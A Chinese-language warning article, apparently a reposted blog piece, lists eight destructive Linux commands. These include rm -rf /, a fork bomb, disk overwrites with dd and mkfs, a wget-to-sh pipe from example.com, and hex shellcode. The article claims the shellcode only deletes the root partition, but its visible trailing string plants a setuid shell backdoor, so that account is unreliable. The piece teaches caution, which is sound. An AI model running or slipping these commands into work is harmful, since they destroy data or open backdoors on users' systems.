八個最致命的Linux命令!
新建Python軟體開發測試技術交友群QQ:952490269(加群備註software)
1,rm -rf Command
rm -rf命令是刪除資料夾及其內容的最快方法之一。但是一點點錯字或失誤可能會導致不可恢復的系統損壞。與rm命令一起使用的一些選項是:
rm 命令用於刪除檔案。 rm -r命令以遞迴方式刪除資料夾,甚至是空資料夾。 rm -f命令在不詢問的情況下刪除“只讀檔案”。 rm -rf /:強制刪除根目錄中的所有內容。 rm -rf *:強制刪除當前目錄/工作目錄中的所有內容 rm -rf. :強制刪除當前資料夾和子資料夾。 rm -rf ~將刪除主資料夾中的所有檔案, 而rm -rf .*將刪除所有配置檔案。
因此,執行rm -rf命令時要小心。如果通過'rm'命令來克服意外刪除檔案,可以在“.bashrc”檔案中建立'rm'命令的別名為'rm -i',它會要求確認每次刪除。
2,:(){:|:&};:
以上實際上是一個fork炸彈。它通過定義一個名為':'的函式來執行,該函式呼叫自身兩次,一次在前臺,一次在後臺。它一直持續執行,直到系統凍結。
:(){:|:&};:
這短短的一行定義了一個shell函式,它可以建立自己的新副本。程序不斷地複製自己,它的副本不斷地複製自己,很快地佔用了所有的CPU時間和記憶體。這會導致你的主機宕機。這基本上是一種拒絕服務攻擊。
3,command > /dev/sda
上面的命令將'command'的輸出寫入塊/ dev / sda。它執行一個命令並將該命令的輸出直接傳送到第一個硬碟驅動器,將資料直接寫入硬碟驅動器並損壞檔案系統。
command - 執行命令(可以是任何命令。) / dev / sda - 將命令的輸出直接寫入硬碟裝置。
塊上的所有檔案將被原始資料替換,從而導致塊上的資料完全丟失。
4,mv folder /dev/null
上面的命令會將'folder'移動到/ dev / null。在Linux ,dev / null或null是一個特殊檔案,它丟棄寫入它的所有資料並報告寫操作成功。例如:
mv~ / dev / null - 將您的主目錄移動到黑洞
mv - 將以下檔案或目錄移動到另一個位置。
〜 - 表示整個主資料夾。
/ dev / null - 將您的主資料夾移動到/ dev / null,銷燬所有檔案並刪除原始副本。
5,wget http://example.com/something -O- | sh
上面的命令從Web下載指令碼並將其傳送到sh,後者執行指令碼的內容。
wget -下載一個檔案。 http://example.com/something——從這個位置下載檔案。 | 將wget命令(您下載的檔案)的輸出直接傳送到另一個命令。 sh -將檔案傳送到sh命令,如果是bash指令碼,sh命令就會執行它。
如果您不確定指令碼是什麼,或者您不信任其來源,那麼這可能很危險 - 不要執行不受信任的指令碼。
6. mkfs.ext3 /dev/sda
上面的命令將格式化塊'sda',你肯定會知道執行上述命令後你的Block(硬碟驅動器)將是新的,全新的!沒有任何資料,將您的系統置於不可恢復的階段。
mkfs.ext3 /dev/sda
總而言之,此命令可以等同於在Windows上執行格式c:它將擦除第一個分割槽上的檔案並用新檔案系統替換它們。
7,dd if=/dev/random of=/dev/sda
上面的命令將清除塊sda並將隨機垃圾資料寫入塊。
dd if=/dev/random of=/dev/sda
當然!您的系統將處於不一致且不可恢復的階段。
8,被隱藏的命令
以下命令只是上面的第一個命令(rm -rf)。這裡的程式碼以十六進位制隱藏,以便無知的使用者可能被欺騙。在終端中執行以下程式碼將擦除根分割槽。
char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;
這種被隱藏的危險命令,通常無法被檢測到。你必須知道你在做什麼以及結果會是什麼。不要編譯或者執行來自未知來源的程式碼。